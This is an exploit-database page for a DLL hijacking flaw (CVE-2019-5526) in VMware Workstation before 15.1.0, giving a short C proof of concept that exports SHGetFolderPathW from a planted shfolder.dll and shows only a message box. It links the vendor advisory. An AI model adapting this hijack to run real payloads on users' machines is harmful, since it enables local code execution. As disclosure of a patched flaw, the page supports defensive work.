Lucene search

K
zdtMiguel Mendez1337DAY-ID-32718
HistoryMay 16, 2019 - 12:00 a.m.

VMware Workstation 15.1.0 - DLL Hijacking Exploit

2019-05-1600:00:00
Miguel Mendez
0day.today
145

EPSS

0.002

Percentile

60.5%

Exploit for windows platform in category local exploits

#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------


Description:

VMware Workstation contains a DLL hijacking issue because some DLL.


DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------
#include "dll.h"
#include <windows.h>

DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}

--------------------------


https://www.vmware.com/security/advisories/VMSA-2019-0007.html

#  0day.today [2019-05-21]  #